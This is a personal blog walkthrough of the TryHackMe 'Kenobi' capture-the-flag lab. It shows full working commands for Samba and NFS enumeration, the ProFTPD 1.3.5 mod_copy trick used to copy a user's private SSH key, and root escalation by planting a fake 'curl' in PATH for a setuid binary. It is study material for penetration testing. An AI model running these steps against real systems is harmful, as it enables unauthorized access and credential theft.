TryHackMe: Kenobi

Hi, friend. We meet again!

You can find this room here

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

This room is beginner level, most of the time you will have useful guide on every task.

You want that flag? You have to go through me first!

[Task 1]: Deploy The Vulnerable Machine & Perform Reconnaissance

First, let’s perform nmap scan on the target:

root@kalibox:~/kenobi# nmap -p- --min-rate=1000 10.10.153.194 -oA nmap/quickscan#result
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
37677/tcp open unknown
40235/tcp open unknown
45809/tcp open unknown
58671/tcp open unknown
Note: just keep in mind that --min-rate=1000 should only be used in CTF competions, because it makes a lot of noise!

From the result of our first scan, we can see 11 open ports, run a second scan with known ports:

root@kalibox:~/kenobi# nmap -sV -p21,22,80,111,139,445,2049,37677,40235,45809,58671 -oA nmap/optimize_scan 10.10.153.194#result:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
37677/tcp open mountd 1-3 (RPC #100005)
40235/tcp open mountd 1-3 (RPC #100005)
45809/tcp open nlockmgr 1-4 (RPC #100021)
58671/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Right now there are 4 ports I’m interested in: port 21,22,80 and 445

Let’s visit the webpage:

Ah, I’m a fan of Star Wars

Take a look at page source and found nothing:

no hidden note for you Neo…

Look like there is nothing interested on this site, let’s move to other port…

[Task 2]: Enumerating Samba For Shares

From our nmap scan, we have Samba running on port 139 & 445, let’s list file share on the host:

root@kalibox:~/kenobi# smbclient -L 10.10.153.194
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We have 3 shares available, take a look at the anonymous share:

root@kalibox:~# smbclient \\\\10.10.153.194\\anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 17:49:09 2019
.. D 0 Wed Sep 4 17:56:07 2019
log.txt N 12237 Wed Sep 4 17:49:09 2019

9204224 blocks of size 1024. 6877104 blocks available
smb: \>

There is a text file, download it on your machine

Let’s read some part of the file:

root@kalibox:~# cat log.txt                                                                                                                                                            
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
| |
| .. |
| . o. . |
| ..=o +. |
| . So.o++o. |
| o ...+oo.Bo*o |
| o o ..o.o+.@oo |
| . . . E .O+= . |
| . . oBo. |
+----[SHA256]-----+

We have potential username:

# Set the user and group under which the server will run.
User kenobi
Group kenobi

From this file we know:

  • Information generated for Kenobi when generating an SSH key for the user
  • Information about the ProFTPD server.

Run another nmap scan on port 111 with a script:

root@kalibox:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.153.194
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 14:20 +07
Nmap scan report for 10.10.153.194
Host is up (0.33s latency).

PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836528.0 6877100.0 22% 16.0T 32000

Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

We can see the mount /var is available

[Task 3]: Gain Initial Access With ProFtpd

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

We already have the version of the ProFTPd service:

PORT      STATE SERVICE     VERSION
21/tcp open ftp ProFTPD 1.3.5

Using searchploit you can get a few exploit for this version:

root@kalibox:~/kenobi# searchsploit proftpd 1.3.5
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Let's put those exploits aside, we can try to do something else

Connect to port 21 with netcat:

root@kalibox:~/kenobi# nc 10.10.153.194 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.153.194]
ls
500 LS not understood
help
214-The following commands are recognized (* =>'s unimplemented):
CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
XRMD MKD XMKD PWD XPWD SIZE SYST HELP
NOOP FEAT OPTS AUTH* CCC* CONF* ENC* MIC*
PBSZ* PROT* TYPE STRU MODE RETR STOR STOU
APPE REST ABOR USER PASS ACCT* REIN* LIST
NLST STAT SITE MLSD MLST
214 Direct comments to root@kenobi

We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands:

SITE CPFR  /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTD /var/tmp/id_rsa
500 'SITE CPTD' not understood
SITE CPTO /var/tmp/id_rsa
250 Copy successful

After that, mount the /var directory to our machine

root@kalibox:~# mkdir /mnt/kenobi
root@kalibox:~# mount 10.10.153.194:/var /mnt/kenobi
root@kalibox:~# ls -la /mnt/kenobi/
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 4 root root 4096 Sep 16 14:29 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Sep 16 14:03 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www

List the content of /tmp you can see kenobi’s private key

root@kalibox:~# ls -l /mnt/kenobi/tmp
total 20
-rw-r--r-- 1 retr0 retr0 1675 Sep 16 14:36 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 16 14:03 systemd-private-95ad0d245f054e42b62dd0bda465b829-systemd-timesyncd.service-Oi8AM5
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

Copy id_rsa to your home folder, change permission with this command:

chmod 600 id_rsa

Now you can login as kenobi with this key via ssh:

kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
[This flag has been censored, you have to find it yourself]

[Task 4]: Privilege Escalation with Path Variable Manipulation

To make thing more comfortable, let’s use a script called “Linux-Smart-Enumeration

On your attack box, use SimpleHTTPServer module from python

root@kalibox:/opt/LinuxPrivEsc/linux-smart-enumeration# python3 -m http.server 80Note: if you have python 1: python -m SimpleHTTPServer 80

On target machine, use wget to download the script:

kenobi@kenobi:~$ wget http://10.11.43.240/lse.sh

This will download linux-smart-enumeration script from my box to kenobi
Just make the script executable with chmod, let it run and grab a coffee

The script will print out a lot of information, take your time to read carefully,
here is something unusual:

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/menu

Run that binary and it shows 3 options:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

If you choose 3 it will output the result of ifconfig command
You can use strings command to looks for human readable strings on a binary:

$ strings /usr/bin/menu

...

curl -I localhost
uname -r
ifconfig
Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
...

This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname). This mean you can manipulate your path to gain a root shell ( this file runs as the root users privileges).
Since it calls the curl binary without a full path, you can create a “fake” curl and change your path, so when we run the binary “menu” it will look for “curl” binary in our desired path!

kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# whoami
root
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Grab that flag and return to our ship commander!

root@kenobi:/tmp# cat /root/root.txt
======README======
Never Give You Up
Never Let You Down

#you think I'm gonna show the flag?

[Overview & Final Thought]

This is a good room for learning basic enumeration, exploitation and linux privilege escalation, I just feel not satisfied much since this room include a lot of guide on how to solve the machine. After all this is beginner level, I hope you have a nice time reading my write up, expect more to come. Cheer!

Time to rewatch my childhood movie!

Hello friends, I’m Retr0, currently I’m learning Info Sec, my main focus is Penetration Testing. I will post CTF write ups here. Have fun reading!